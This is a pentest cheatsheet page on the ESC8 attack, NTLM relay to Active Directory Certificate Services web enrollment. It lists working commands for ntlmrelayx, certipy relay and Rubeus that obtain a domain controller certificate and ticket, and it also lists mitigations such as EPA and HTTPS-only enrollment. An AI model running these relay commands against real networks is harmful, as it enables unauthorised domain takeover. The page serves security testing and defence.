Back to Active Directory

Esc8

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

ESC8 (NTLM Relay to ADCS Web Enrollment) attacks relay captured NTLM authentication requests to the ADCS Web Enrollment endpoints. If the relayed authentication has sufficient privileges, the attacker can enroll a certificate for the relayed account.

This attack enables privilege escalation by relaying from a compromised machine to the CA server's certificate enrollment endpoint.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Esc8:

impacket-ntlmrelayx -t http://CA.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
Rubeus.exe asktgt /user:DC$ /certificate:dc.pfx /ptt
certipy relay -ca <ca-server> -template DomainController

Tools & Techniques

Recommended tools for Esc8:

  • Impacket ntlmrelayx: NTLM relay with ADCS module
  • Certipy relay: relay-to-ADCS tool
  • Rubeus: use enrolled certificate for TGT request
  • Requires: network access to ADCS enrollment endpoint

Prevention & Mitigation

Security recommendations to prevent Esc8:

  • Disable NTLM authentication on ADCS servers if possible
  • Enable Extended Protection for Authentication (EPA) on ADCS
  • Place ADCS servers in a protected network segment
  • Use HTTPS with channel binding for ADCS endpoints
  • Disable HTTP enrollment endpoints, use HTTPS only

References

Additional resources: